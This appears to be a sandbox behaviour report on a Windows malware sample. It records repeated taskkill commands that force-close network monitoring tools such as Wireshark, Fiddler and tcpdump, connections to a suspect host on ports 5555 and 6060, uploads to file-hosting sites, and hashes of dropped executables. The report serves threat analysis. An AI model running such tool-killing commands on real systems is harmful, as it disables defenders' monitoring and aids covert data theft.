C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| NL | 91.92.241.69:5555 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn3.gstatic.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tcp | |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | store8.gofile.io | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freeimage.host | udp |
| US | 104.21.22.122:443 | freeimage.host | tcp |
| US | 8.8.8.8:53 | 31.191.168.206.in-addr.arpa | udp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | 122.22.21.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:62901 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | netlimiter.com | udp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 8.8.8.8:53 | 13.202.40.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.netlimiter.com | udp |
| SK | 37.9.175.165:443 | download.netlimiter.com | tcp |
| SK | 37.9.175.165:443 | download.netlimiter.com | tcp |
| US | 8.8.8.8:53 | 165.175.9.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | 21.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
Files
C:\Users\Admin\AppData\Roaming\Prism.exe
| MD5 | 42e50ba9365d54d40cbf45ee3c6f24db |
| SHA1 | a9f9c39a3710b40369fb20d2e0aa5a9ef2d3e6b7 |
| SHA256 | 2b02ec22d0ef11d392e29f2d8a58ff55ba49705d00ba8598e8f02fe4fa8e808a |
| SHA512 | 5e86c52d655f9c3586e46b6fb20742c6a0795234b59cb88d25497d2465d621b7a1de45ff67be207a3cb700a812bdd8dcb399c0c8debe529be512fb1434230756 |
C:\Users\Admin\AppData\Local\dllhost.exe
| MD5 | cc7686bf7c7d81f59196d5cc3cab3348 |
| SHA1 | ac39079f223f87d404c421c48239f913b12f00a8 |
| SHA256 | 49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7 |
| SHA512 | 940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae |
memory/2860-25-0x00000000008E0000-0x00000000008F8000-memory.dmp
memory/4216-22-0x0000000073A90000-0x0000000074240000-memory.dmp
memory/4216-21-0x0000000002A70000-0x0000000002AA6000-memory.dmp
memory/1876-16-0x0000000073A9E000-0x0000000073A9F000-memory.dmp
memory/1876-88-0x00000000052D0000-0x00000000058F8000-memory.dmp
memory/4216-953-0x0000000005160000-0x00000000051C6000-memory.dmp
memory/4216-952-0x0000000004FF0000-0x0000000005056000-memory.dmp
memory/1876-959-0x0000000005AD0000-0x0000000005E24000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl86t.dll
| MD5 | ad03d1e9f0121330694415f901af8f49 |
| SHA1 | ad8d3eee5274fef8bb300e2d1f4a11e27d3940df |
| SHA256 | 224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9 |
| SHA512 | 19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3m1yxif2.a5u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\init.tcl
| MD5 | e10e428598b2d5f2054cfae4a7029709 |
| SHA1 | f8e7490e977c3c675e76297638238e08c1a5e72e |
| SHA256 | 61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939 |
| SHA512 | 88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\encoding\cp1252.enc
| MD5 | 5900f51fd8b5ff75e65594eb7dd50533 |
| SHA1 | 2e21300e0bc8a847d0423671b08d3c65761ee172 |
| SHA256 | 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0 |
| SHA512 | ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk86t.dll
| MD5 | e3c7ed5f9d601970921523be5e6fce2c |
| SHA1 | a7ee921e126c3c1ae8d0e274a896a33552a4bd40 |
| SHA256 | bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77 |
| SHA512 | bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\_tkinter.pyd
| MD5 | 0f1aa5b9a82b75b607b4ead6bb6b8be6 |
| SHA1 | 5d58fd899018a106d55433ea4fcb22faf96b4b3d |
| SHA256 | 336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190 |
| SHA512 | b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52 |
memory/4216-986-0x0000000006020000-0x000000000603E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl8\8.5\msgcat-1.6.1.tm
| MD5 | db52847c625ea3290f81238595a915cd |
| SHA1 | 45a4ed9b74965e399430290bcdcd64aca5d29159 |
| SHA256 | 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55 |
| SHA512 | 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\tm.tcl
| MD5 | 52db1cd97ceab81675e86fa0264ea539 |
| SHA1 | b31693b5408a847f97ee8004fed48e5891df6e65 |
| SHA256 | 6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669 |
| SHA512 | 5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\tk.tcl
| MD5 | 25094462d2ea6b43133275bf4db31a60 |
| SHA1 | 6bb76294e8fdf4d40027c9d1b994f1ab0014b81b |
| SHA256 | 3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1 |
| SHA512 | 8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\auto.tcl
| MD5 | 5e9b3e874f8fbeaadef3a004a1b291b5 |
| SHA1 | b356286005efb4a3a46a1fdd53e4fcdc406569d0 |
| SHA256 | f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840 |
| SHA512 | 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\tclIndex
| MD5 | 996f74f323ea95c03670734814b7887f |
| SHA1 | 49f4b9be5ab77e6ccab8091f315d424d7ac183f3 |
| SHA256 | 962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13 |
| SHA512 | c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56 |
memory/4216-987-0x0000000006050000-0x000000000609C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe
| MD5 | c24dace1f65f7e093a15d481751fbe16 |
| SHA1 | acbd52cfed32989ec9b3fb889510908dfc72ecbd |
| SHA256 | 245d74dba68221df5889940afa54a303d94bc41f1ba5245d46739a7cce007c23 |
| SHA512 | 97eda294fb9d564a8f4683fb60bf30d224cfefdc476b796249f402f270ecdbfbf6d7d4ffddbc6b646fd14ec90bc6f6db877b83b8e113f67e81528454633e8374 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\vcruntime140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
| SHA512 | aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
memory/4216-950-0x0000000004F50000-0x0000000004F72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\vistaTheme.tcl
| MD5 | ad2d78020875529834dd0ea74251e2d3 |
| SHA1 | 80cc99972a056396dd55e9505ccb02e16462b115 |
| SHA256 | ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e |
| SHA512 | 59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\encoding\symbol.enc
| MD5 | 1b612907f31c11858983af8c009976d6 |
| SHA1 | f0c014b6d67fc0dc1d1bbc5f052f0c8b1c63d8bf |
| SHA256 | 73fd2b5e14309d8c036d334f137b9edf1f7b32dbd45491cf93184818582d0671 |
| SHA512 | 82d4a8f9c63f50e5d77dad979d3a59729cd2a504e7159ae3a908b7d66dc02090dabd79b6a6dc7b998c32c383f804aacabc564a5617085e02204adf0b13b13e5b |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\xpTheme.tcl
| MD5 | 1026799ffe26aaa8661f64d6f2cbe4dd |
| SHA1 | 5cd337feb3130d146134e06c4a1826ba29157e7a |
| SHA256 | ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318 |
| SHA512 | 90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\winTheme.tcl
| MD5 | 8b4813a1c6915fd35b52ac854230bcc1 |
| SHA1 | db981087f2a311361446014fadbd8b199d856716 |
| SHA256 | 05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f |
| SHA512 | e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\clamTheme.tcl
| MD5 | beced087eeb3d5c9b2eabdb19c030d52 |
| SHA1 | be285e65905d335be442606afa3a88e408d5ec5b |
| SHA256 | 93c29536262c582104bf1804d7b06c7565b7d621f2e3605ff8b6c981a3b4ab01 |
| SHA512 | 84b733c3fbe63c32b5b1e6cd132bd1b55f07b47612b70455c17c4d6d239682672c838cc3d739283079d0d2d8567fca9b763465d8d2148d25b5952282ed521a79 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\altTheme.tcl
| MD5 | ae1b9c4dc2de8e899749fb4e1fcb4df6 |
| SHA1 | 2a09d325ca56c930b3afb1ee43c944fd4416b8e1 |
| SHA256 | 92b8be9d8934850b6d240b970603b0ad7c6dd4a45134545694fb52966d742861 |
| SHA512 | 2803f96729805c90143e0c4c9bf25398bac7d6e4402cb09be354c35566fc3c3bd9522372147c0e956bdbbc2943b9aecb0f5c96b527a26fd790b8fdb5b99efe10 |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\classicTheme.tcl
| MD5 | 70f3edfbfd4c16febdd8311290a0effe |
| SHA1 | 4b1d63d59c72c357931a8cbbf071654492a9b371 |
| SHA256 | c7b1f40d77820fbaf2195f2bb3f334b38fec653fe47653f9e30a01ad4ca63ba5 |
| SHA512 | a58c584ada6d271316266d58641be260f98e6fa0ae867ee9e343807a2955ddd3544b864cca80dc7f164ed4be5331575b696650ff0bb469c3647c5cb122f2a64c |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\defaults.tcl
| MD5 | 16843ecd9e716a87d865a6539ef44751 |
| SHA1 | 3df76af0d6e4c386d63dd061100702dbb0f72a42 |
| SHA256 | d83248b535a9417ce0ca598bbe245f24252adc90e3611c1191a045d9c0a9c99f |
| SHA512 | 7f5e7a200fd6b012a9336035211d9d89f0504f61156629ebcc1a03bcf8462ba8d219de376b6bb3ebb9e6a9507f0ac6f7d658eed5b953110df553b3c0c44ebc1d |
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\sizegrip.tcl
| MD5 | 3c8916a58c6ee1d61836e500a54c9321 |
| SHA1 | 54f3f709698fad020a048668749cb5a09ede35ab |
| SHA256 | 717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33 |
| SHA512 | 2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267 |
